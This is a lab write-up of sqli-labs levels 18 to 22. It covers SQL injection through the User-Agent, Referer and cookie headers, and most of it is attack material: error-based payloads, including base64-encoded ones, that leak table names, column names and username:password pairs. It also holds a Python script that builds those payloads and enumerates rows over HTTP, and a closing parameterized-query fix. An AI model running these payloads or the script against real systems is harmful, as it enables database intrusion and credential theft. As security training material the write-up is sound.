SQL-LABS: From Beginner to Giving Up, 7 (part 1)

Preface

The next few levels involve HTTP headers, so we first need a basic understanding of the header fields in question.
Details

User-Agent

The browser identifies itself (which browser it is);

Example: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

Referer

The browser tells the web server which page/URL it came from, i.e. where the URL in the current request was obtained or clicked;

Example: Referer: http://www.sina.com/

Cookie

Data that some sites store on the user's device in order to identify the user and track the session (the value is usually an opaque token, sometimes signed or encrypted);

Example: Cookie: userId=C5bYpXrimdmsiQmsBPnE1Vn8ZQmdWSm3WRlEB3vRwTnRtW

Less-18

  1. The hint for the level is Less-18 Header Injection- Error Based- string
    Looking at the source, both uname and passwd go through check_input(), so there is no way to inject through these two parameters;

    // check_input() truncates to 20 chars, escapes with mysql_real_escape_string()
    // and wraps the value in single quotes, which is why $uname/$passwd appear unquoted below
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
  2. Looking at the SQL statements, the User-Agent ($uagent) is pasted into the INSERT without any escaping, so we can inject through it;

    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    // $uagent is $_SERVER['HTTP_USER_AGENT'] and $IP is $_SERVER['REMOTE_ADDR'], neither escaped;
    // this INSERT only runs once the SELECT above has matched a valid account
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
  3. Construct the error-based payload (the value sits inside single quotes here, so the payload has to close the opening quote and re-balance the closing one; send it together with a valid login such as the lab's admin/admin, because the INSERT only runs after the login succeeds)

    ' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e)) and '1'='1

Less-19

  1. The hint for the level is Less-19 Header Injection- Referer- Error Based- string
    So the injection point should be the Referer; look at the key source

    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    // the lab reuses the name $uagent for $_SERVER['HTTP_REFERER']; again unescaped and only inserted after a successful login
    $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
  2. Construct the error-based payloads (the Referer is wrapped in single quotes exactly like the User-Agent in Less-18, so the same closing trick works)

    ' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e)) and '1'='1

    ' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and '1'='1

Less-20

  1. The hint for the level is Less-20 Cookie Injection- Error Based- string
    This should be injection through the cookie; look at the key source

    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    // on a later request, $cookee = $_COOKIE['uname'] is pasted in without escaping
    $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
  2. From the source: after a successful login the server sets a cookie uname=<username>, and on the next refresh the username is read back from that cookie and used in the second query. So log in once, then edit the cookie and refresh; the SQL statement changes along with it. Strictly speaking the cookie branch does no session check at all, so any request that carries a uname cookie reaches the query.

    cookie: uname=admin1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e))#

    cookie: uname=admin1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

Less-21

  1. The hint for the level is Less-21 Cookie Injection- Error Based- complex - string
    This is still cookie injection, but the value must be base64-encoded, and the query wraps it in single quotes plus parentheses, so the payload has to close both

    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    // $cookee = $_COOKIE['uname'] is base64-decoded and then used unescaped inside ('...')
    $cookee = base64_decode($cookee);

    $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
  2. Base64-encode the payload first, then perform the error-based injection. Send the base64 text as the cookie value and percent-encode any + as %2B: PHP URL-decodes cookie values and would otherwise turn + into a space and corrupt the encoding.

    Before encoding:
    admin') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

    After encoding:
    YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpLDB4N2UpLDEpIw==

    Before encoding:
    admin') and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    After encoding:
    YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKFNFTEVDVCBkaXN0aW5jdCBjb25jYXQoMHgyMyx1c2VybmFtZSwweDNhLHBhc3N3b3JkLDB4MjMpIEZST00gdXNlcnMgbGltaXQgMCwxKSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGxpbWl0IDAsMSksZmxvb3IocmFuZCgwKSoyKSl4IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBncm91cCBieSB4KWEpIw==

Less-22

  1. The hint for the level is Less-22 Cookie Injection- Error Based- Double Quotes - string
    So the value is presumably wrapped in double quotes; sending the base64 of admin" (YWRtaW4i) as the cookie confirms it:

    your MySQL server version for the right syntax to use near '"admin"" LIMIT 0,1' at line 1
  2. Key source

    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    // $cookee = $_COOKIE['uname'] is base64-decoded, then wrapped in double quotes without escaping
    $cookee = base64_decode($cookee);
    $cookee1 = '"'. $cookee. '"';

    $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
  3. As in Less-21, base64-encode the payload and send it as the cookie value (percent-encode any + as %2B), then perform the error-based injection

    Before encoding:
    admin" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

    After encoding:
    YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDAsMSksMHg3ZSksMSkj

    Before encoding:
    admin" and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    After encoding:
    YWRtaW4iIGFuZCAoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIGRpc3RpbmN0IGNvbmNhdCgweDIzLHVzZXJuYW1lLDB4M2EscGFzc3dvcmQsMHgyMykgRlJPTSB1c2VycyBsaW1pdCAyLDEpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
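The five levels differ only in how the value is quoted, which header carries it (User-Agent, Referer or the uname cookie) and whether the server base64-decodes it first. The script below is an added example, not code from sqli-labs: it builds the payload for each level, encodes the cookie value, reads the leaked value back out of the XPATH error and walks limit N,1 to enumerate rows. The lab host/path taken by lab_send(), the `send` callable and the responses produced by fake_lab() are assumptions so that the file runs offline; it uses updatexml() for every level, and the extractvalue() payloads on this page behave the same way.

```python
"""Error-based injection through HTTP headers, as used in Less-18 to Less-22.

Added example, not sqli-labs code. The `send` callable, the host/path taken by
lab_send() and the responses produced by fake_lab() are assumptions.
"""
import base64
import http.client
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import quote, unquote_plus, urlencode

# (text that closes the quoting around the value, text that re-balances the
# statement) for each level, read off the PHP quoted on this page.
LEVELS: Dict[int, Tuple[str, str]] = {
    18: ("'", " and '1'='1"),   # User-Agent  -> VALUES ('$uagent', ...)
    19: ("'", " and '1'='1"),   # Referer     -> VALUES ('$uagent', ...)
    20: ("'", "#"),             # Cookie      -> username='$cookee'
    21: ("')", "#"),            # Cookie, b64 -> username=('$cookee')
    22: ('"', "#"),             # Cookie, b64 -> username="$cookee"
}
B64_LEVELS = {21, 22}
XPATH_ERR_LEN = 32  # MySQL prints at most 32 chars of the bad XPath expression
LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)~?'")
Send = Callable[[Dict[str, str]], str]  # headers -> response body

def error_payload(level: int, subquery: str, username: str = "") -> str:
    """Close the quote, make updatexml() fail with the result of `subquery`
    in the error text, then re-balance the statement for this level."""
    prefix, suffix = LEVELS[level]
    return f"{username}{prefix} and updatexml(1,concat(0x7e,({subquery}),0x7e),1){suffix}"

def cookie_value(level: int, payload: str) -> str:
    """Value for `Cookie: uname=...`. Levels 21/22 base64-decode it first.
    PHP URL-decodes cookie values (a raw '+' turns into a space), so the
    base64 text is percent-encoded rather than sent as-is."""
    if level in B64_LEVELS:
        payload = base64.b64encode(payload.encode()).decode()
    return quote(payload, safe="")

def request_headers(level: int, payload: str) -> Dict[str, str]:
    """The one header that carries the injection for this level."""
    if level == 18:
        return {"User-Agent": payload}
    if level == 19:
        return {"Referer": payload}
    return {"Cookie": "uname=" + cookie_value(level, payload)}

def leaked(body: str) -> Optional[str]:
    """Value between the 0x7e markers of the MySQL error, or None when the
    page showed no error (the subquery returned NULL: no more rows)."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None

def enumerate_rows(level: int, send: Send, template: str,
                   username: str = "", max_rows: int = 64) -> List[str]:
    """Walk `limit {n},1` through `template` until nothing leaks any more."""
    rows: List[str] = []
    for n in range(max_rows):
        payload = error_payload(level, template.format(n=n), username)
        value = leaked(send(request_headers(level, payload)))
        if value is None:
            break
        rows.append(value)
    return rows

def lab_send(host: str, path: str, uname: str, passwd: str) -> Send:
    """Real transport (host/path assumed): POST the login form plus the injected
    header. Less-18/19 only run their INSERT once the login has succeeded."""
    def send(headers: Dict[str, str]) -> str:
        body = urlencode({"uname": uname, "passwd": passwd, "submit": "Submit"})
        conn = http.client.HTTPConnection(host, timeout=10)
        conn.request("POST", path, body=body, headers={
            "Content-Type": "application/x-www-form-urlencoded", **headers})
        text = conn.getresponse().read().decode(errors="replace")
        conn.close()
        return text
    return send

def fake_lab(level: int, column_names: List[str]) -> Send:
    """Constructed stand-in for the lab so this file runs offline: unwraps the
    header the way that level's PHP does, finds `limit N,1` in the probe and
    answers with the error updatexml() would raise for row N."""
    def send(headers: Dict[str, str]) -> str:
        if "Cookie" in headers:  # PHP URL-decodes the cookie value
            sql = unquote_plus(headers["Cookie"].split("=", 1)[1])
        else:
            sql = headers.get("User-Agent") or headers["Referer"]
        if level in B64_LEVELS:
            sql = base64.b64decode(sql).decode()
        n = int(re.search(r"limit (\d+),1", sql).group(1))
        if n >= len(column_names):
            return "<html>logged in, no error</html>"
        return "XPATH syntax error: '%s'" % ("~" + column_names[n] + "~")[:XPATH_ERR_LEN]
    return send

if __name__ == "__main__":
    tpl = "select column_name from information_schema.columns where table_name='users' limit {n},1"
    for lvl in LEVELS:
        print(lvl, enumerate_rows(lvl, fake_lab(lvl, ["id", "username", "password"]), tpl, "admin"))
```

Against a real lab instance, swap fake_lab() for something like lab_send("127.0.0.1", "/sqli-labs/Less-18/", "admin", "admin"); the credentials matter for Less-18/19 because their INSERT only runs after the login succeeds. Because MySQL truncates the XPath expression in the error to 32 characters (the markers included), values longer than about 30 characters must be split with substr() inside the subquery.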

Afterword

Only error-based injection was used here; I didn't try union-based or blind injection (a bit confusing), but I think it should work the same way. I'll leave that as an open question to fill in later.
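The levels above all share one root cause: a header or cookie value is concatenated into the SQL text. The following is an added example, not sqli-labs code, rebuilding the Less-18 INSERT and the Less-20 SELECT on an in-memory SQLite database (constructed tables), once string-built as the PHP does and once with bound parameters. SQLite has no updatexml(), so the payloads are generic quote-closing ones; the function names and sample rows are assumptions.

```python
"""The Less-18 INSERT and the Less-20 cookie SELECT, string-built as in the
lab and then rewritten with bound parameters.

Added example, not sqli-labs code. Runs on an in-memory SQLite database
(a constructed copy of the tables involved), so the payloads are generic
quote-closing ones rather than the MySQL-only updatexml() trick.
"""
import sqlite3
from typing import Optional, Tuple

Row = Optional[Tuple]

def new_db() -> sqlite3.Connection:
    """Constructed stand-in for the `security` database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE uagents (id INTEGER PRIMARY KEY, uagent TEXT,
                              ip_address TEXT, username TEXT);
        INSERT INTO users (username, password) VALUES ('Dumb', 'Dumb'), ('admin', 'admin');
    """)
    return conn

def last_uagent(conn: sqlite3.Connection) -> Row:
    return conn.execute("SELECT uagent, ip_address, username FROM uagents "
                        "ORDER BY id DESC LIMIT 1").fetchone()

# Less-18: the User-Agent header is pasted into the INSERT.
def log_uagent_vulnerable(conn, uagent: str, ip: str, uname: str) -> Row:
    """Same shape as the PHP `$insert`: a quote in the header rewrites the SQL."""
    conn.execute("INSERT INTO uagents (uagent, ip_address, username) "
                 f"VALUES ('{uagent}', '{ip}', '{uname}')")
    return last_uagent(conn)

def log_uagent_safe(conn, uagent: str, ip: str, uname: str) -> Row:
    """Bound parameters: the header is stored byte for byte, never parsed."""
    conn.execute("INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
                 (uagent, ip, uname))
    return last_uagent(conn)

# Less-20: the uname cookie is pasted into the SELECT.
def user_by_cookie_vulnerable(conn, cookee: str) -> Row:
    """Same shape as the PHP: `x' OR '1'='1` returns the first user."""
    return conn.execute(
        f"SELECT * FROM users WHERE username='{cookee}' LIMIT 0,1").fetchone()

def user_by_cookie_safe(conn, cookee: str) -> Row:
    """Bound parameter: the cookie only ever matches a literal username."""
    return conn.execute(
        "SELECT * FROM users WHERE username=? LIMIT 0,1", (cookee,)).fetchone()

def parser_error(conn, uagent: str) -> Optional[str]:
    """The engine's error text for a User-Agent, or None. This is the channel
    the error-based payloads on this page rely on: the engine has to be
    parsing attacker text before it can complain about it."""
    try:
        log_uagent_vulnerable(conn, uagent, "127.0.0.1", "admin")
    except sqlite3.OperationalError as e:
        return str(e)
    return None

if __name__ == "__main__":
    db = new_db()
    forged = "Mozilla/5.0', '10.0.0.1', 'victim') -- "
    print(log_uagent_vulnerable(db, forged, "127.0.0.1", "admin"))  # attacker-chosen row
    print(log_uagent_safe(db, forged, "127.0.0.1", "admin"))        # header stored verbatim
    print(parser_error(db, "' and updatexml(1,concat(0x7e,(select 1),0x7e),1) and '1'='1"))
    print(user_by_cookie_vulnerable(db, "x' OR '1'='1"), user_by_cookie_safe(db, "x' OR '1'='1"))
```

The forged User-Agent shows the non-error side of the same bug: with string building the attacker picks the ip_address and username that get logged, while the parameterized INSERT stores the whole header as the uagent column. The page's own Less-18 payload makes SQLite reject updatexml() as an unknown function, which is exactly the error channel the MySQL version turns into data exfiltration; the parameterized statement never gives the attacker's text to the parser at all.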
